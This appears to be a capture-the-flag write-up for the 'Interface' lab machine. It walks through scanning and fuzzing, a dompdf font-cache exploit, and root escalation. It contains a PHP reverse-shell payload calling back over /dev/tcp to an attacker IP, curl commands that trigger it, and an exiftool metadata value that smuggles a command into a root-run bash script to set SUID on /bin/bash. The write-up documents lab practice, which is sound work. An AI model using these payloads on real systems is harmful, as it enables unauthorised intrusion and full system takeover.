Scanning

> TARGET=10.10.11.200 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site Maintenance

• Domain: interface.htb
• Found domain name prd.m.rendering-api.interface.htb in response header

curl -i http://interface.htb/
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 22 Feb 2023 00:26:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 6359
Connection: keep-alive
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
X-Powered-By: Next.js
ETag: "i8ubiadkff4wf"
Vary: Accept-Encoding

• dirsearch

> dirsearch -u http://prd.m.rendering-api.interface.htb -x 404
[19:33:04] 403 -   15B  - /composer.lock
[19:33:04] 403 -   15B  - /composer.json
[19:33:48] 200 -    0B  - /vendor/composer/autoload_classmap.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_namespaces.php
[19:33:48] 200 -    0B  - /vendor/autoload.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_psr4.php
[19:33:48] 200 -    0B  - /vendor/composer/ClassLoader.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_real.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_static.php
[19:33:48] 403 -   15B  - /vendor/composer/LICENSE
[19:33:48] 403 -   15B  - /vendor/composer/installed.json

> dirsearch -u http://prd.m.rendering-api.interface.htb/vendor/ -x 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[19:38:22] 403 -   15B  - /vendor/dompdf
[19:40:01] 403 -   15B  - /vendor/composer

> wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hh 0 http://prd.m.rendering-api.interface.htb/FUZZ
000000078:   404        0 L      3 W        50 Ch       "api"
000001518:   403        1 L      2 W        15 Ch       "vendor"

> wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hh 50 -X POST http://prd.m.rendering-api.interface.htb/api/FUZZ
000006080:   422        0 L      2 W        36 Ch       "html2pdf"

• Search for exploits dompdf: https://github.com/positive-security/dompdf-rce

dompdf-rce: user flag

• find api parameters

> wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://prd.m.rendering-api.interface.htb/api/html2pdf -d '{"FUZZ":"test"}' --hh 36

000000145:   200        76 L     184 W      1130 Ch     "html"

• prepare two files and serve on http
• exploit.css

@font-face {
    font-family:'exploitfont';
    src:url('http://<ip>/exploit_font.php');
    font-weight:'normal';
    font-style:'normal';
  }

• exploit_font.php

<binary content from https://github.com/positive-security/dompdf-rce/blob/main/exploit/exploit_font.php>
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/<ip>/4444 0>&1'"); ?>

• trigger the target to load the font into cache

> curl http://prd.m.rendering-api.interface.htb/api/html2pdf -d '{"html":"<link rel=stylesheet href='http://<ip>/exploit.css'>"}'

• calc the cached address of the font php file

> echo -n 'http://<ip>/exploit_font.php' | md5sum           
1deff7de0ba37475948a8355e7b417b8  -

• call the cached font php to trigger the reverse shell

> curl -i http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_1deff7de0ba37475948a8355e7b417b8.php

• get user flag in /home/dev

pe: bash white collar eval

• locate a script at /usr/local/sbin/cleancache.sh

#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
    if [[ -f "$cfile" ]]; then
        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"
        fi
    fi
done

• the script checks for files where Producer equals to dompdf under /tmp and delete the file.
• "$meta_producer" -eq "dompdf" is exploitable, for detail: https://www.vidarholen.net/contents/blog/?p=716

> echo 'chmod +s /bin/bash' > /dev/shm/oooo.sh
> chmod +x /dev/shm/oooo.sh

> touch /tmp/oooo
> exiftool -Producer='a[$(/dev/shm/oooo.sh>&2)]+42' /tmp/oooo

• wait for the exploit to run and prompt as root